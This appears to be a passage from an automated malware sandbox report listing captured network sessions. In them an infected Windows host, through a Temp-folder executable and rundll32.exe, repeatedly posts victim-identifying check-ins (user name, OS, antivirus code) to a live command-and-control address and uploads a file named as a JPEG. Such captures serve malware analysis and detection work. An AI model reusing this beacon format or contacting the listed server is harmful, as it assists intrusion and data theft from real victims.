2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 22:59:52.565543890 CEST8038OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 22:59:52.565619946 CEST8054OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 22:59:52.663382053 CEST8062OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#
                                                                                                                                          Apr 28, 2021 22:59:52.663460970 CEST8075OUTData Raw: 62 e1 7d 54 d7 e6 bf 51 f0 7b ea 4a b7 d6 71 3c f6 f8 3d de 6b f6 bf b3 e4 f9 f3 58 fd 2b eb de 30 fd 75 d1 fa b6 1b 91 3f 8f de e5 b7 7b 7b 5e 7f 97 2d cf 86 7f e0 af 5f b4 a7 c1 af da a7 f6 a6 b2 f8 95 f0 33 c5 6f ac e8 d0 f8 3e d2 c6 4b b7 d3
                                                                                                                                          Data Ascii: b}TQ{Jq<=kX+0u?{{^-_3o>K"tvN,ss_'m;(E{5xqNq_Wx"n+7d%#&1RWINNft]x?Xvb:)W^zjsKCjr
                                                                                                                                          Apr 28, 2021 22:59:52.663566113 CEST8086OUTData Raw: 9b 25 a6 ff 00 90 0a bc b6 f8 a5 f2 3d e8 f6 42 f6 cc cc 93 4b dd f2 54 32 68 e1 ba 25 6d 79 07 fb b4 e5 b4 ec 12 a7 d8 d2 1a c5 4e 27 35 36 89 c6 70 2a 9d c6 85 f2 1c 57 65 f6 1f fa 67 51 cb a5 ef 3f 72 b9 a5 81 84 8d a9 e6 12 89 e7 f7 5e 1f 73
                                                                                                                                          Data Ascii: %=BKT2h%myN'56p*WegQ?r^sqzMVu+W07lYz&^y9J~J\gDKBu-?Yueg`cn,|\Wox|wa^_=39i-?{V"Igb
                                                                                                                                          Apr 28, 2021 22:59:52.663775921 CEST8104OUTData Raw: cf f6 5a f1 27 c5 0f 0e 78 47 43 26 d2 ca 49 2c f5 3b 28 55 42 cc bd 36 ff 00 c0 ab dc c3 78 93 52 a6 26 95 0c cf 01 28 39 c9 47 9b a6 a6 33 e0 ca b8 5a 15 71 39 7e 65 0a b1 a5 17 2e 5f b5 64 7f 29 5f f2 d2 bf 4a 7f e0 d5 eb 2d 33 52 ff 00 82 97
                                                                                                                                          Data Ascii: Z'xGC&I,;(UB6xR&(9G3Zq9~e._d)_J-3Rj:+u]X$0#3_wWF{~++[7/xa2nBy9$JU+e!vY}HRSg>y[wi/f=G;-!2,L$+'~k
                                                                                                                                          Apr 28, 2021 22:59:52.663810968 CEST8107OUTData Raw: c5 e2 6d 27 4c 8e 7b 08 6f 42 cd 9d d6 b0 2b 24 9b 30 8c 16 46 5f 99 87 cd c1 af c2 2a fd 17 22 c7 e2 31 f8 36 f1 11 b4 e1 27 09 7a ab 7d db eb e6 7c 1e 73 82 c3 e0 b1 4b d8 4a f0 9c 54 a3 e8 ef fe 43 a3 ef 4b c2 8a 5a 2b dd 3c 81 23 90 e6 9f bb
                                                                                                                                          Data Ascii: m'L{oB+$0F_*"16'z}|sKJTCKZ+<#sI':o&V$ON&"L3L$GdfjM,?<zuhwbSG;NNifXG[S1c?*JBz;UTS[#D|
                                                                                                                                          Apr 28, 2021 22:59:52.762814999 CEST8118OUTData Raw: c5 7d 8b f1 a3 c0 9e 16 bc f8 c5 e2 cb bb 8f 8d 1e 19 b5 92 5f 13 5f bb da cf 6b aa 19 21 26 e1 c9 46 29 64 ca 58 74 3b 58 8c 8e 09 1c d7 c6 5f f0 75 15 bc 76 7f 08 7f 64 9b 4b 5b f8 ae 92 2f 0c 78 81 12 ea 00 e2 39 94 5b e8 20 3a 87 55 60 a7 a8
                                                                                                                                          Data Ascii: }__k!&F)dXt;X_uvdK[/x9[ :U`&}']Oc7z1')+x-oF]jDG7~(#$#3M9?Fw|?9'M
                                                                                                                                          Apr 28, 2021 22:59:52.762873888 CEST8139OUTData Raw: 7e a7 c7 f3 31 ff 00 7a bf 2a bf e0 bc ff 00 73 42 ff 00 b1 96 f3 ff 00 49 ed eb d3 c8 ff 00 df 9f a1 c5 9a ef 4b fc 5f a3 3f 21 64 ed 42 75 a6 c9 d0 fd 69 aa d8 5e 6b cd 3e e4 9b f8 d7 eb 53 27 fa bf c2 a1 b7 6d dc 53 e5 6f 2f ad 54 4c e5 7f 84
                                                                                                                                          Data Ascii: ~1z*sBIK_?!dBui^k>S'mSo/TL#ILiH/xSG%RA#23F;Q3TSG/vn+2(;[m!cWQ&d aB}v,Q$U&7Rbw5g4vBT?
                                                                                                                                          Apr 28, 2021 22:59:52.763149023 CEST8141OUTData Raw: 5f 16 3f 66 9f da d3 f6 99 d1 be 0c e8 5f b0 83 f8 a3 e2 ce 87 e0 7b 5d 47 47 9b 5d f8 6d 24 b7 71 69 fe 31 5f 11 5f 1b 8d 5e f1 e1 ff 00 90 7b de 45 fd 9f 73 1d ed c3 28 92 05 8b 13 30 b7 62 9e ea ff 00 17 ff 00 67 e6 f1 96 8b e3 8d 2e 7b c5 f1
                                                                                                                                          Data Ascii: _?f_{]GG]m$qi1__^{Es(0bg.{1|TO-;!En]pit;&Vv&E{rm>/NuT\zY{+8r_~'xA'g\&*M%p+{\lF


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          263176.111.174.11480192.168.2.449907C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:52.961832047 CEST8241INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:52 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          264192.168.2.449908176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:53.538793087 CEST8241OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          265176.111.174.11480192.168.2.449908C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:53.642342091 CEST8545INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:53 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          266192.168.2.449910176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:53.854027033 CEST8546OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          267176.111.174.11480192.168.2.449910C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:53.960473061 CEST8546INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:53 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          268192.168.2.449911176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:54.178077936 CEST8547OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          269176.111.174.11480192.168.2.449911C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:54.275764942 CEST8547INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:54 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          27176.111.174.11480192.168.2.449761C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:13.637495041 CEST4534INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:13 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          270192.168.2.449912176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:54.490307093 CEST8548OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          271176.111.174.11480192.168.2.449912C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:54.588093042 CEST8548INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:54 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          272192.168.2.449913176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:54.800630093 CEST8549OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          273176.111.174.11480192.168.2.449913C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:54.900244951 CEST8549INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:54 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          274192.168.2.449915176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:55.123074055 CEST8550OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          275176.111.174.11480192.168.2.449915C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:55.230662107 CEST8551INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:55 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          276192.168.2.449916176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:55.440531969 CEST8551OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          277176.111.174.11480192.168.2.449916C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:55.539870024 CEST8552INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:55 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
